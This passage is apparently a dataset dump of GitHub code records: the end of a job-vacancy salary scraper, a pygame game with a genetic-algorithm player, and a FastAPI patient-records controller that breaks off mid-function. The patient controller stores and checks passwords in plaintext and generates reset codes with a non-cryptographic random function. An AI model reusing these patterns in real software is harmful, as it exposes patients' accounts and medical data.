logging.warning(f\"Данные по языку {language} от сервиса HH не найдены\")\n break\n vacancies_pages.append(vacancies_page)\n if page >= vacancies_page['pages'] - 1:\n break\n\n logging.info(f\"Завершено получение данных по языку {language} от сервиса HH\")\n return vacancies_pages\n\n\ndef get_vacancies_sj(language, key):\n url = \"https://api.superjob.ru/2.0/vacancies/\"\n headers = {\n \"X-Api-App-Id\": key,\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n vacancies_pages = []\n for page in count(0):\n payload = {\n \"keyword\": f'Программист {language}',\n \"town\": 4,\n \"page\": page,\n \"count\": 100\n }\n response = requests.get(url, headers=headers, params=payload)\n response.raise_for_status()\n vacancies_page = response.json()\n if not vacancies_page[\"total\"]:\n logging.warning(f\"Данные по языку {language} от сервиса SJ не найдены\")\n break\n vacancies_pages.append(vacancies_page)\n if not vacancies_page['more']:\n break\n\n logging.info(f\"Завершено получение данных по языку {language} от сервиса SJ\")\n return vacancies_pages\n\n\ndef calculate_rub_salary_hh(vacancy):\n if vacancy[\"salary\"]:\n currency = vacancy[\"salary\"][\"currency\"]\n salary_from = vacancy[\"salary\"][\"from\"]\n salary_to = vacancy[\"salary\"][\"to\"]\n if currency == \"RUR\":\n return calculate_salary(salary_from, salary_to)\n\n\ndef calculate_rub_salary_sj(vacancy):\n salary_from = vacancy[\"payment_from\"]\n salary_to = vacancy[\"payment_to\"]\n currency = vacancy[\"currency\"]\n if currency == \"rub\":\n return calculate_salary(salary_from, salary_to)\n\n\ndef calculate_salary(salary_from, salary_to):\n if salary_from:\n if salary_to:\n return (salary_from + salary_to) / 2\n else:\n return salary_from * 1.2\n elif salary_to:\n return salary_to * 0.8\n\n\ndef make_clever_print(statistics, title):\n table_data = [\n (\n \"Язык программирования\",\n \"Вакансий найдено\",\n \"Вакансий обработано\",\n \"Средняя зарплата\"\n )\n ]\n for language in statistics:\n info = statistics[language]\n table_data.append(\n (\n language,\n info[\"vacancies_found\"],\n info[\"vacancies_processed\"],\n info[\"average\"]\n )\n )\n\n table_instance = AsciiTable(table_data, title)\n table_instance.justify_columns[2] = 'right'\n return table_instance.table\n\n\ndef process_vacancies_hh(vacancies_pages):\n language_params = {\n \"average\": 0,\n \"vacancies_processed\": 0,\n \"vacancies_found\": 0,\n }\n for vacancies_page in vacancies_pages:\n vacancies = vacancies_page[\"items\"]\n total_vacancies = vacancies_page[\"found\"]\n for vacancy in vacancies:\n salary = calculate_rub_salary_hh(vacancy)\n if salary:\n language_params[\"average\"] += salary\n language_params[\"vacancies_processed\"] += 1\n language_params[\"vacancies_found\"] = total_vacancies\n language_params[\"average\"] = int(language_params[\"average\"] / language_params[\"vacancies_processed\"])\n return language_params\n\n\ndef process_vacancies_sj(vacancies_pages):\n language_params = {\n \"average\": 0,\n \"vacancies_processed\": 0,\n \"vacancies_found\": 0,\n }\n for vacancies_page in vacancies_pages:\n vacancies = vacancies_page[\"objects\"]\n total_vacancies = vacancies_page[\"total\"]\n for vacancy in vacancies:\n salary = calculate_rub_salary_sj(vacancy)\n if salary:\n language_params[\"average\"] += salary\n language_params[\"vacancies_processed\"] += 1\n language_params[\"vacancies_found\"] += total_vacancies\n language_params[\"average\"] = int(language_params[\"average\"] / language_params[\"vacancies_processed\"])\n return 
\n\n\nif __name__ == \"__main__\":\n    top_languages = [\n        \"JavaScript\",\n        \"Java\",\n        \"Python\",\n        \"Ruby\",\n        \"PHP\",\n    ]\n    sj_key = dotenv_values(\".env\")[\"SJ_SECRET_KEY\"]\n    top_languages_info_hh = {}\n    top_languages_info_sj = {}\n    for language in top_languages:\n        try:\n            vacancies_pages_hh = get_vacancies_hh(language)\n            if vacancies_pages_hh:\n                top_languages_info_hh[language] = process_vacancies_hh(vacancies_pages_hh)\n            vacancies_pages_sj = get_vacancies_sj(language, sj_key)\n            if vacancies_pages_sj:\n                top_languages_info_sj[language] = process_vacancies_sj(vacancies_pages_sj)\n        except requests.exceptions.HTTPError as error:\n            logging.error(\"Can't get data from server:\\n{0}\".format(error))\n    print(\n        make_clever_print(\n            top_languages_info_hh,\n            \"HeadHunter vacancies in Moscow\"\n        ),\n        end=\"\\n\\n\"\n    )\n    print(make_clever_print(\n        top_languages_info_sj,\n        \"SuperJob vacancies in Moscow\"\n    ))\n","repo_name":"Yar59/HeadHunter-and-SuperJob","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"16282556993","text":"import pygame\nimport os\nimport sys\nimport importlib\nimport inspect\nfrom player import Player\nfrom worlds_hardest_game.src.geneticAlgorithm.population import Population\nfrom enemy import Enemy\nfrom field import Field\nfrom time import sleep\n\n\n# IDEA make a new class for the lvl choosing\nclass Game:\n\n    def __init__(self, lvlName, humanPlayer=True):\n        # verify types\n        if not isinstance(lvlName, str):\n            raise TypeError('Expected str; got %s' % type(lvlName).__name__)\n        # check if it is a valid lvlName\n        if not self.validFileName(lvlName):\n            raise Exception('The level name %s is not valid.' % lvlName)  # was type(lvlName).__name__, which printed \"str\" instead of the name\n        # check if lvl exists\n        self.lvlPath = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, (\"lvl/\" + lvlName + \".py\"))\n        # if the file doesn't exist raise exception\n        if not os.path.exists(self.lvlPath):\n            raise Exception('The lvl %s doesn\\'t exist.' 
% lvlName)\n        # if the lvl exists, save the lvl name\n        self.lvlName = lvlName\n        # set the relative module name (only valid inside the project)\n        self.modulePath = 'worlds_hardest_game.lvl'\n        # import the lvl file\n        self.importLvl = importlib.import_module('.'+self.lvlName, self.modulePath)\n        # build the lvl class name and functionality\n        self.lvlClassName = self.lvlName[0].upper() + self.lvlName[1::]\n        # create the right class object so it can be used\n        self.lvlClass = getattr(self.importLvl, self.lvlClassName)\n        # create lvl instance\n        self.lvl = self.lvlClass()\n        # check if human player\n        self.humanPlayer = humanPlayer\n        # set default parameters for a population\n        self.populationSize = 100\n        self.mutationRate = 0.01\n        self.moveIncreasePerFiveRounds = 30\n        self.maxGenerations = 500\n        # create empty variables for font and screen and players, and for all goal objects\n        self.font = None\n        self.screen = None\n        self.players = []\n        self.goals = []\n        self.population = None\n        self.stop = False\n        # start the game screen\n        self.initGame()\n\n    @staticmethod\n    def validFileName(name):\n        # list of illegal characters, as well as - and .\n        illegalChars = ['#', '%', '&', '{', '}', '\\\\', '<', '>', '*', '?', '/', ' ', '$', '!',\n                        '\\'', '\\\"', ':', '@', '+', '`', '|', '=', '-', '.']\n        # iterate over all illegal chars and check if any is part of the name\n        for char in illegalChars:\n            if char in name:\n                print(f\"The character {char} is not allowed to be part of the fileName\")\n                return False\n        # check that the file name starts with a lower case character\n        if not name[0].islower():\n            print(\"The first character has to be lower case\")\n            return False\n        return True\n\n    # this method initiates the game\n    def initGame(self):\n        # start pygame\n        pygame.init()\n        # IDEA later add a Deathcounter below; this requires increasing the window size\n        # start the screen\n        self.screen = pygame.display.set_mode((self.lvl.windowWidth, self.lvl.windowHeight))\n        # set font\n        self.font = pygame.font.Font('freesansbold.ttf', 15)\n        # draw first time\n        self.drawHuman()\n        # save all goal tiles\n        for colum in self.lvl.field.field:\n            for tile in colum:\n                if tile.goal:\n                    self.goals.append(tile.object)\n        # initiate the player; human and genetic runs differ here\n        if self.humanPlayer:\n            self.players.append(Player(list(self.lvl.playerStartingPos), self.lvl.playerSize))\n            self.runningHuman()\n        else:\n            # create a default player\n            self.players.append(Player(list(self.lvl.playerStartingPos), self.lvl.playerSize))\n            self.population = Population(self.populationSize, self.players[0], self.mutationRate, self.moveIncreasePerFiveRounds, self.lvl.field, self.maxGenerations)\n            self.runningAI()\n        # stop pygame\n        pygame.quit()\n\n    # this method handles all the game interactions\n    def runningHuman(self):\n        # set roughly the speed for the game in frames per second\n        fps = 30\n        # calculate how long to wait as 1000 ms / fps; the delay function needs an int\n        delay = int(1000 / fps)\n        running = True\n        # keep the game loop running while the round is active\n        while running:\n            # add a pygame delay so the game is not always updating\n            pygame.time.delay(delay)\n            # draw everything\n            self.drawHuman()\n            # update all objects\n            running = self.updateHuman()\n\n    # this method draws the screen\n    def drawHuman(self):\n        self.screen.fill((183, 175, 250))\n        self.lvl.field.draw(self.screen)\n        for player in self.players:\n            player.draw(self.screen)\n        pygame.display.update()\n\n    # this method updates everything\n    def updateHuman(self):\n        self.lvl.field.move()\n        events = pygame.event.get()
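\n        # pygame requires the event queue to be pumped every frame; get() both\n        # keeps the OS window responsive and lets us detect QUIT below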
\n        for event in events:\n            # detect if window has been closed\n            if event.type == pygame.QUIT:\n                return False\n        # get all down pressed keys\n        keys = pygame.key.get_pressed()\n        # update the player\n        self.players[0].moveHuman(keys, self.screen, self.lvl.field)\n        # check for collision\n        if self.collisionHuman():\n            return False\n        return True\n\n    # this method checks for collision with enemies and the goal\n    def collisionHuman(self):\n        collision = [False] * len(self.players)\n        # list enemy objects\n        enemies = list(map(lambda x: x.object, self.lvl.field.enemy))\n        # check if collision with enemy\n        for idx, player in enumerate(self.players):\n            if player.object.collidelist(enemies) != -1:\n                print(\"You died.\")\n                player.reset()\n                collision[idx] = True\n        # if all players collided reset lvl\n        if all(collision):\n            self.lvl = self.lvlClass()\n            self.goals = []\n            self.drawHuman()\n            # save all goal tiles just in case\n            for colum in self.lvl.field.field:\n                for tile in colum:\n                    if tile.goal:\n                        self.goals.append(tile.object)\n            return False\n        # check if any player reached the goal\n        for idx, player in enumerate(self.players):\n            if player.object.collidelist(self.goals) != -1:\n                print(\"Reached goal\")\n                print(f'Player died {player.deaths} times.')\n                player.goal = True\n                collision[idx] = True\n        return True\n\n    def runningAI(self):\n        # set roughly the speed for the game in frames per second\n        fps = 30\n        # calculate how long to wait as 1000 ms / fps; the delay function needs an int\n        delay = int(1000 / fps)\n        running = True\n        # keep the game loop running while the generation is active\n        while running:\n            # add a pygame delay so the game is not always updating\n            pygame.time.delay(delay)\n            # draw everything\n            self.drawAI()\n            # update all objects\n            running = self.updateAI()\n        # the generation finished\n        self.population.calcFitness()\n        # check if the maximum generations have been reached\n        if not self.stop and self.population.currentGeneration < self.population.maxGeneration:\n            # finished n-th generation\n            print(f'Finished {self.population.currentGeneration}-th generation.')\n            # reset the field\n            self.lvl = self.lvlClass()\n            self.goals = []\n            self.drawAI()\n            # save all goal tiles just in case\n            for colum in self.lvl.field.field:\n                for tile in colum:\n                    if tile.goal:\n                        self.goals.append(tile.object)\n            # generate the next generation\n            self.population.newGeneration()\n            # rerun running\n            return self.runningAI()\n        if self.stop:\n            print(\"User stopped the program.\")\n        else:\n            print(\"Reached Population limit\")\n\n    # this method draws everything for the ai\n    def drawAI(self):\n        self.screen.fill((183, 175, 250))\n        self.lvl.field.draw(self.screen)\n        self.population.draw(self.screen)\n        pygame.display.update()\n        return\n\n    # this method updates everything\n    def updateAI(self):\n        self.lvl.field.move()\n        events = pygame.event.get()\n        for event in events:\n            # detect if window has been closed\n            if event.type == pygame.QUIT:\n                self.stop = True\n                return False\n        # move all creatures\n        result = self.population.move(self.screen)\n        # check for collisions\n        self.collisionAI()\n        # return result\n        return result\n\n    # this method calculates the collision for the ai\n    def collisionAI(self):\n        # list enemy objects\n        enemies = list(map(lambda x: x.object, self.lvl.field.enemy))\n        # check if collision with enemy\n        for idx, 
player in enumerate(self.population.creatures):\n if player.player.object.collidelist(self.goals) != -1:\n print(\"Reached goal\")\n print(f'Player died {player.player.deaths} times.')\n player.player.goal = True\n\nq = Game('lvlTest', humanPlayer=False)\n","repo_name":"Joni0131/worlds_hardest_game","sub_path":"src/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40333989469","text":"\"\"\"Controller file for writing db queries\"\"\"\nimport json\nimport math\nimport random\nimport sys\nfrom fastapi import HTTPException,Request, UploadFile\nfrom typing import Optional\nfrom sqlalchemy import Integer\nfrom sqlalchemy.orm import Session\nfrom authentication import Authentication\nfrom jwt_utility import JWTUtility\nimport patient\nfrom patient.email_manager import EmailManager\nfrom response import Response as ResponseData\nfrom patient.app.models import models,schemas\nfrom hospital.app.api.controller import check_if_hospital_id_is_valid\nfrom patient.app.error_handling import Error\nimport ast\nfrom fastapi.responses import FileResponse\n\nsys.path.append('/Users/anirudh.chawla/python_fast_api_projects/hospital-management-fastapi')\n\n\n# Python code to merge dict using update() method\ndef Merge(dict1, dict2):\n \"\"\"Function to merge dict using update method\"\"\"\n return dict2.update(dict1)\n\ndef add_new_patient(database: Session, file: UploadFile, first_name: str, last_name: str, contact_number: str,password: str,\n email: str, gender: str,\n date_of_birth: str, blood_group: str,\n hospital_id: str,marital_status: str, height: str, weight: str,\n emergency_contact_number: str, city: str,\n allergy: str, current_medication: str,\n past_injury: str,past_surgery: str, smoking_habits: str, alchol_consumption: str,\n activity_level: str, food_preference: str,\n occupation: str):\n \"\"\"Function to add new patient data\"\"\"\n db_patient_email = database.query(models.Patient).filter(models.Patient.email == email).first()\n db_patient_number = database.query(models.Patient).filter(models.Patient.contact_number == contact_number).first()\n if db_patient_email or db_patient_number:\n return ResponseData.success_without_data(\"This user already exists\")\n patientdata = {\n \"first_name\": first_name,\n \"last_name\": last_name,\n \"contact_number\": contact_number,\n \"password\" : password,\n \"email\": email,\n \"gender\": gender,\n \"date_of_birth\": date_of_birth,\n \"blood_group\": blood_group,\n \"hospital_id\": hospital_id,\n 'profile_pic' : f'patient_images/{file}'\n }\n db_patient = models.Patient(**patientdata)\n database.add(db_patient)\n database.commit()\n database.refresh(db_patient)\n patient_details_data = {\n \"id\" : db_patient.id,\n \"marital_status\": marital_status,\n \"height\": height,\n \"weight\": weight,\n \"emergency_contact_number\": emergency_contact_number,\n \"city\": city,\n \"smoking_habits\" : smoking_habits,\n \"alchol_consumption\": alchol_consumption,\n \"activity_level\": activity_level,\n \"occupation\" : occupation,\n }\n db_patient_details = models.PatientDetails(**patient_details_data)\n database.add(db_patient_details)\n database.commit()\n database.refresh(db_patient_details)\n Merge(patientdata, patient_details_data)\n token = {\n 'authentication_token' : JWTUtility.encode_token(db_patient.email,db_patient.contact_number)\n }\n Merge(token, patient_details_data)\n if len(allergy.split(\",\")) > 0 and allergy 
!= \"\":\n new_list = []\n for i in range(0,len(str(allergy).split(\",\"))):\n data = database.query(models.Allergies).filter(models.Allergies.id == str(allergy.split(\",\")[i])).first()\n print(f\"data {data}\")\n if data is None:\n return ResponseData.success_without_data(\"Allergy id is invalid\")\n new_list.append(data)\n allergy_data = {\n \"patient_id\" : str(db_patient.id),\n \"allergy_id\" : str(allergy.split(\",\")[i])\n }\n db_patient_allergies_details = models.Patient_Allergies(**allergy_data)\n database.add(db_patient_allergies_details)\n database.commit()\n database.refresh(db_patient_allergies_details)\n # patient_details_data[\"allergies\"] = new_list\n if len(food_preference.split(\",\")) > 0 and food_preference != \"\":\n new_list = []\n for i in range(0,len(str(food_preference).split(\",\"))):\n data = database.query(models.FoodPreference).filter(models.FoodPreference.id == str(food_preference.split(\",\")[i])).first()\n if data is None:\n return ResponseData.success_without_data(\"food preference id is invalid\")\n new_list.append(data)\n food_preferences = {\n \"patient_id\" : str(db_patient.id),\n \"food_preference_id\" : str(food_preference.split(\",\")[i])\n }\n db_patient_food_preference_details = models.Patient_FoodPreference(**food_preferences)\n database.add(db_patient_food_preference_details)\n database.commit()\n database.refresh(db_patient_food_preference_details)\n # patient_details_data[\"food_preferences\"] = new_list\n new_list = []\n if len(current_medication.split(\",\")) > 0 and current_medication != \"\":\n print(f'current_medication.split(\",\") {current_medication.split(\",\")}')\n for i in range(0,len(str(current_medication).split(\",\"))):\n if not database.query(models.CurrentMedications).filter(models.CurrentMedications.id == str(current_medication.split(\",\")[i])).first():\n return ResponseData.success_without_data(\"Current medication id is invalid\")\n new_list.append(database.query(models.CurrentMedications).filter(models.CurrentMedications.id == str(current_medication.split(\",\")[i])).first())\n current_medications = {\n \"patient_id\" : str(db_patient.id),\n \"current_medication_id\" : str(current_medication.split(\",\")[i])\n }\n db_patient_current_medication_details = models.Patient_CurrentMedications(**current_medications)\n database.add(db_patient_current_medication_details)\n database.commit()\n database.refresh(db_patient_current_medication_details)\n # patient_details_data[\"current_medications\"] = new_list\n new_list = []\n if len(past_injury.split(\",\")) > 0 and past_injury != \"\":\n print(f'str(past_injury).split(\",\") {str(past_injury).split(\",\")}')\n for i in range(0,len(str(past_injury).split(\",\"))):\n if not database.query(models.PastInjuries).filter(models.PastInjuries.id == str(past_injury.split(\",\")[i])).first():\n return ResponseData.success_without_data(\"Past injury id is invalid\")\n # new_list.append(database.query(models.PastInjuries).filter(models.PastInjuries.id == str(past_injury.split(\",\")[i])).first())\n past_injuries = {\n \"patient_id\" : str(db_patient.id),\n \"past_injury_id\" : str(past_injury.split(\",\")[i])\n }\n db_patient_past_injuries_details = models.Patient_PastInjuries(**past_injuries)\n database.add(db_patient_past_injuries_details)\n database.commit()\n database.refresh(db_patient_past_injuries_details)\n # patient_details_data[\"past_injuries\"] = new_list\n new_list = []\n if len(past_surgery.split(\",\")) > 0 and past_surgery != \"\":\n for i in 
range(0,len(str(past_surgery).split(\",\"))):\n if not database.query(models.PastSurgeries).filter(models.PastSurgeries.id == str(past_surgery.split(\",\")[i])).first():\n return ResponseData.success_without_data(\"Past surgery id is invalid\")\n new_list.append(database.query(models.PastSurgeries).filter(models.PastSurgeries.id == str(past_surgery.split(\",\")[i])).first())\n past_surgery = {\n \"patient_id\" : str(db_patient.id),\n \"past_surgery_id\" : str(past_surgery.split(\",\")[i])\n }\n db_patient_past_surgeries_details = models.Patient_PastSurgeries(**past_surgery)\n database.add(db_patient_past_surgeries_details)\n database.commit()\n database.refresh(db_patient_past_surgeries_details)\n # patient_details_data[\"past_surgeries\"] = new_list\n if patient_details_data[\"hospital_id\"] is None:\n patient_details_data[\"hospital_id\"] = \"\"\n # patient_details_data.pop(\"allergies\")\n # patient_details_data.pop(\"food_preferences\")\n # patient_details_data.pop(\"current_medications\")\n # patient_details_data.pop(\"past_injuries\")\n # patient_details_data.pop(\"past_surgeries\")\n return ResponseData.success(patient_details_data,\"New Patient added successfully\")\n\ndef get_patient(request:Request,database: Session, contact_number : str):\n \"\"\"Function to tell user if patient with given contact number already exists or not\"\"\"\n return database.query(models.Patient).filter(models.Patient.contact_number == contact_number).first()\n\nasync def patient_forget_password(database: Session, email : Optional[str] = None):\n \"\"\"Function to tell user if patient with given contact number already exists or not\"\"\"\n db_patient_email = database.query(models.Patient).filter(models.Patient.email == email).first()\n if not db_patient_email:\n return ResponseData.success_without_data(\"Email id is invalid\")\n digits = \"0123456789\"\n OTP = \"\"\n for i in range(6):\n OTP += digits[math.floor(random.random() * 10)]\n otp = list(OTP)\n if otp[0] == \"0\":\n otp[0] = \"1\"\n OTP = \"\" \n for i in range(0,len(otp)):\n OTP+=otp[i]\n template = '''\n\n\n\n\n
<html>\n<head>\n    <title>Otp for resetting password</title>\n</head>\n<body>\n    <p>Your otp is {0}</p>\n</body>\n</html>
\n'''.format(OTP)\n    await EmailManager().forgot_password(\n        email,\n        \"Forgot Password\",\n        template\n    ),\n    # user_otp_data = OtpForPasswordModel.objects.filter(\n    #     user_id=user_data.id\n    # ).first()\n    return database.query(models.Patient).filter(models.Patient.email == email).first()\n\ndef reset_password_for_patient(database: Session, old_password : str,new_password : str,patient_id:int):\n    \"\"\"Function to reset password for a particular patient\"\"\"\n    db_patient = database.query(models.Patient).filter(models.Patient.id == patient_id,models.Patient.password == old_password).first()\n    if not db_patient:\n        return ResponseData.success_without_data(\"Password is invalid\")\n    database.query(models.Patient).filter(models.Patient.id == patient_id).update({\n        models.Patient.password : new_password, \n    })\n    database.flush()\n    database.commit()\n    return ResponseData.success({},\"Password has been updated successfully\")\n\ndef patient_sign_in_api(database: Session,email : Optional[str] = None,password : Optional[str] = None):\n    \"\"\"Function to sign in a patient\"\"\"\n    db_patient = database.query(models.Patient).filter(models.Patient.email == email,models.Patient.password == password).first()\n    if not db_patient:\n        return ResponseData.success_without_data(\"Credentials are invalid\")\n    db_patient_details = database.query(models.Patient).filter(models.Patient.email == email).first()\n    token = {\n        'authentication_token' : JWTUtility.encode_token(db_patient_details.email,db_patient_details.contact_number)\n    }\n    Merge(token, db_patient_details.__dict__)\n    if db_patient_details.__dict__[\"hospital_id\"] is None:\n        db_patient_details.__dict__[\"hospital_id\"] = \"\"\n    db_patient_details.__dict__.pop(\"password\")\n    return ResponseData.success(db_patient_details.__dict__,\"Patient signed in successfully\")\n\ndef get_patient_by_id(database: Session, id : Optional[int] = None):\n    \"\"\"Function to fetch a patient's full profile by id, or the first patient when no id is given\"\"\"\n    if id is None:\n        db_patient = database.query(models.Patient).filter().first()\n        db_patient_details = database.query(models.PatientDetails).filter().first()\n        Merge(db_patient.__dict__, db_patient_details.__dict__)\n        return ResponseData.success(db_patient_details.__dict__,\"Patient details fetched successfully\")\n    db_patient = database.query(models.Patient).filter(models.Patient.id == id).first()\n    if db_patient is None:\n        return ResponseData.success([],\"Patient with this id does not exists\")\n    db_patient_details = database.query(models.PatientDetails).filter(models.PatientDetails.id == id).first()\n    Merge(db_patient.__dict__, db_patient_details.__dict__)\n    allergies_list = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(db_patient.id)).all()\n    allergies = []\n    for i in range(0,len(allergies_list)):\n        allergy = database.query(models.Allergies).filter(models.Allergies.id == str(allergies_list[i].allergy_id)).first()\n        if allergy is not None:\n            allergies.append(allergy)\n    db_patient_details.__dict__[\"patient_allergies\"] = allergies\n    medications_list = database.query(models.Patient_CurrentMedications).filter(models.Patient_CurrentMedications.patient_id == str(db_patient.id)).all()\n    medications = []\n    for i in range(0,len(medications_list)):\n        medication = database.query(models.CurrentMedications).filter(models.CurrentMedications.id == str(medications_list[i].current_medication_id)).first()\n        if medication is not None:\n            medications.append(medication)
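\n        # NOTE: this issues one query per linked id (an N+1 pattern); fine for\n        # short lists, but a single .filter(...id.in_(ids)) query would scale better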
\n    db_patient_details.__dict__[\"patient_current_medications\"] = medications\n    injuries_list = database.query(models.Patient_PastInjuries).filter(models.Patient_PastInjuries.patient_id == str(db_patient.id)).all()\n    injuries = []\n    for i in range(0,len(injuries_list)):\n        injury = database.query(models.PastInjuries).filter(models.PastInjuries.id == str(injuries_list[i].past_injury_id)).first()\n        if injury is not None:\n            injuries.append(injury)\n    db_patient_details.__dict__[\"patient_past_injuries\"] = injuries\n    surgeries_list = database.query(models.Patient_PastSurgeries).filter(models.Patient_PastSurgeries.patient_id == str(db_patient.id)).all()\n    surgeries = []\n    for i in range(0,len(surgeries_list)):\n        surgery = database.query(models.PastSurgeries).filter(models.PastSurgeries.id == str(surgeries_list[i].past_surgery_id)).first()\n        if surgery is not None:\n            surgeries.append(surgery)\n    db_patient_details.__dict__[\"patient_past_surgeries\"] = surgeries\n    food_preference_list = database.query(models.Patient_FoodPreference).filter(models.Patient_FoodPreference.patient_id == str(db_patient.id)).all()\n    food_preference = []\n    for i in range(0,len(food_preference_list)):\n        food = database.query(models.FoodPreference).filter(models.FoodPreference.id == str(food_preference_list[i].food_preference_id)).first()\n        if food is not None:\n            food_preference.append(food)\n    db_patient_details.__dict__[\"patient_food_preferences\"] = food_preference\n    if db_patient_details.__dict__[\"hospital_id\"] is None:\n        db_patient_details.__dict__[\"hospital_id\"] = \"\"\n    return ResponseData.success(db_patient_details.__dict__,\"Patient details fetched successfully\")\n\ndef get_patient_by_pagination(database: Session,page : int,size:int):\n    \"\"\"Function to get patient details by pagination\"\"\"\n    data = database.query(models.Patient,models.PatientDetails).filter(models.Patient.id == models.PatientDetails.id).all()\n    listdata = []\n    if len(data) > 0:  # was \"> 1\", which wrongly skipped the single-patient case\n        for i, ele in enumerate(data):\n            dict1 = ele[\"PatientDetails\"]\n            dict2 = ele[\"Patient\"]\n            dict1.__dict__.update(dict2.__dict__)\n            listdata.append(dict1) \n        data = listdata[page*size : (page*size) + size]\n        if len(data) > 0:\n            return ResponseData.success(data,\"Patient details fetched successfully\")\n        return ResponseData.success([],\"No Patient found\") \n    return ResponseData.success(listdata,\"No Patient found\")\n\ndef delete_patient_details(database: Session, id : Optional[int] = None):\n    \"\"\"Function to delete single or all patient details if needed\"\"\"\n    if id is None:\n        database.query(models.Patient).delete()\n        database.commit()\n        return ResponseData.success([],\"All Patient details deleted successfully\")\n    database.query(models.Patient).filter_by(id = id).delete()\n    database.query(models.PatientDetails).filter_by(id = id).delete()\n    # delete rows from the link tables; the original targeted the lookup tables\n    # (models.Allergies etc.), which have no patient_id column\n    database.query(models.Patient_Allergies).filter_by(patient_id = str(id)).delete()\n    database.query(models.Patient_CurrentMedications).filter_by(patient_id = str(id)).delete()\n    database.query(models.Patient_PastInjuries).filter_by(patient_id = str(id)).delete()\n    database.query(models.Patient_PastSurgeries).filter_by(patient_id = str(id)).delete()\n    database.commit()\n    return ResponseData.success([],\"Patient details deleted successfully\")\n\ndef check_if_patient_id_is_valid(database: Session, id : Optional[int] = None):\n    \"\"\"Function to check if patient id exists or not\"\"\"\n    patient_data = database.query(models.Patient).filter(models.Patient.id == id).first()\n    if patient_data:\n        
return True\n else:\n return False\n\ndef update_fields(actualDict,key,value):\n if key != '' or key is not None:\n actualDict[f\"{key}\"] = value\n\ndef update_patient_details(database: Session, profile_pic: UploadFile, first_name: str, last_name: str, contact_number: str,\n email: str, gender: str,\n date_of_birth: str, blood_group: str,\n hospital_id: str,marital_status: str, height: str, weight: str,\n emergency_contact_number: str, city: str,\n allergy: str, current_medication: str,\n past_injury: str,past_surgery: str, smoking_habits: str, alchol_consumption: str,\n activity_level: str, food_preference: str,\n occupation: str, patient_id: Integer):\n \"\"\"Function to update patient details\"\"\"\n db_patient = database.query(models.Patient).filter(models.Patient.id == patient_id).first()\n if db_patient is None:\n return ResponseData.success({},\"Patient with this id does not exists\")\n print(f\"first_name {db_patient.first_name}\")\n dict2 = {\n \"first_name\": first_name if first_name != \"\" else db_patient.first_name,\n \"last_name\": last_name if last_name != \"\" else db_patient.last_name,\n \"contact_number\": contact_number if contact_number != \"\" else db_patient.contact_number,\n \"email\": email if email != \"\" else db_patient.email,\n \"gender\": gender if gender != \"\" else db_patient.gender,\n \"date_of_birth\": date_of_birth if date_of_birth != \"\" else db_patient.date_of_birth,\n \"blood_group\": blood_group if blood_group != \"\" else db_patient.blood_group,\n \"hospital_id\": hospital_id if hospital_id != \"\" else db_patient.hospital_id,\n 'profile_pic' : f\"patient_images/{profile_pic}\" if profile_pic != \"\" else f\"{db_patient.profile_pic}\",\n }\n for key,value in dict2.items():\n update_fields(dict2,key,value)\n db_patient_details = database.query(models.PatientDetails).filter(models.PatientDetails.id == patient_id).first()\n dict1 = {\n \"marital_status\":marital_status if marital_status != \"\" else db_patient_details.marital_status,\n \"height\": height if height != \"\" else db_patient_details.height,\n \"weight\": weight if weight != \"\" else db_patient_details.weight,\n \"emergency_contact_number\": emergency_contact_number if emergency_contact_number != \"\" else db_patient_details.emergency_contact_number,\n \"city\": city if city != \"\" else db_patient_details.city,\n \"smoking_habits\" : smoking_habits if smoking_habits != \"\" else db_patient_details.smoking_habits,\n \"alchol_consumption\": alchol_consumption if alchol_consumption != \"\" else db_patient_details.alchol_consumption,\n \"activity_level\": activity_level if activity_level != \"\" else db_patient_details.activity_level,\n \"occupation\" : occupation if occupation != \"\" else db_patient_details.occupation,\n }\n for key,value in dict1.items():\n update_fields(dict1,key,value)\n if len(allergy.split(\",\")) > 0 and allergy != \"\":\n database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id)).delete()\n for i in range(0,len(str(allergy).split(\",\"))):\n print(f'str(allergy).split(\",\")[i] {str(allergy).split(\",\")[i]}')\n # check_if_id_is_valid = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id),models.Patient_Allergies.allergy_id == str(allergy.split(\",\")[i])).first()\n # print(f\"check_if_id_is_valid {check_if_id_is_valid}\")\n # if check_if_id_is_valid is None:\n # return ResponseData.success_without_data(\"Allergies id is invalid\")\n allergy_data = {\n \"patient_id\" : 
str(db_patient.id),\n \"allergy_id\" : str(allergy.split(\",\")[i])\n }\n db_patient_allergies_details = models.Patient_Allergies(**allergy_data)\n database.add(db_patient_allergies_details)\n database.commit()\n database.refresh(db_patient_allergies_details)\n if len(current_medication) > 0 :\n database.query(models.Patient_CurrentMedications).filter(models.Patient_CurrentMedications.patient_id == str(patient_id)).delete()\n for i in range(0,len(str(current_medication).split(\",\"))):\n print(f'str(current_medication).split(\",\")[i] {str(current_medication).split(\",\")[i]}')\n # check_if_id_is_valid = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id),models.Patient_Allergies.allergy_id == str(allergy.split(\",\")[i])).first()\n # print(f\"check_if_id_is_valid {check_if_id_is_valid}\")\n # if check_if_id_is_valid is None:\n # return ResponseData.success_without_data(\"Allergies id is invalid\")\n current_medications = {\n \"patient_id\" : str(db_patient.id),\n \"current_medication_id\" : str(current_medication.split(\",\")[i])\n }\n db_patient_current_medication_details = models.Patient_CurrentMedications(**current_medications)\n database.add(db_patient_current_medication_details)\n database.commit()\n database.refresh(db_patient_current_medication_details)\n if len(past_injury) > 0 :\n database.query(models.Patient_PastInjuries).filter(models.Patient_PastInjuries.patient_id == str(patient_id)).delete()\n for i in range(0,len(str(past_injury).split(\",\"))):\n print(f'str(past_injury).split(\",\")[i] {str(past_injury).split(\",\")[i]}')\n # check_if_id_is_valid = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id),models.Patient_Allergies.allergy_id == str(allergy.split(\",\")[i])).first()\n # print(f\"check_if_id_is_valid {check_if_id_is_valid}\")\n # if 